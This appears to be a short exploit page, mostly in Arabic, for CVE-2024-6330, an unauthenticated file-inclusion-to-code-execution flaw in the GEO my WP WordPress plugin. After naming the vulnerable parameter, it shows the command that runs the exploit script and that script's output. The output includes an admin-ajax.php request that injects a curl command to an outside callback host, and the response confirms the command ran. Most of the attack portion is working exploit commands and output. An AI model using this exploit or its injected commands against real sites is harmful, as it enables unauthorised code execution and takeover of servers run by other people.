
GEO my WordPress < 4.5.0.2 - استغلال LFI غير مصادق عليه إلى RCE/PHAR Deserialization
GEO my WordPress <= 4.5.0.1 - تضمين ملف محلي غير موثَّق
إضافة GEO my WP لووردبريس معرضة لتضمين ملف محلي في جميع الإصدارات حتى 4.5.0.1 بما في ذلك عبر المعامل 'form[info_window_template][content_path]'. وهذا يُمكّن المهاجمين غير الموثَّقين من تضمين وتنفيذ ملفات عشوائية على الخادم، مما يسمح بتنفيذ أي كود PHP في تلك الملفات. يمكن استخدام هذا لتجاوز ضوابط الوصول، أو الحصول على بيانات حساسة، أو تحقيق تنفيذ كود في حالات يمكن فيها رفع وتضمين الصور وأنواع ملفات "آمنة" أخرى.
python3 CVE-2024-6330.py --url https://wp-dev.ddev.site --proxy http://127.0.0.1:8080 --execute="curl http://2qtstva3iqdxwqryck6wh3wsqjwak08p.oast.site"
[*] Starting security test...
[*] Initial visit to https://wp-dev.ddev.site: 200
[+] Testing object_id: 1
[+] URL: https://wp-dev.ddev.site/wp-admin/admin-ajax.php?action=gmw_info_window_init&0=echo%20Command%20Output:%20$(curl http://2qtstva3iqdxwqryck6wh3wsqjwak08p.oast.site)
[+] Status Code: 200
[+] Response Content:
Command Output: <html><body>ivv900fnzbln0dem43z7zmzjjgigz</body></html>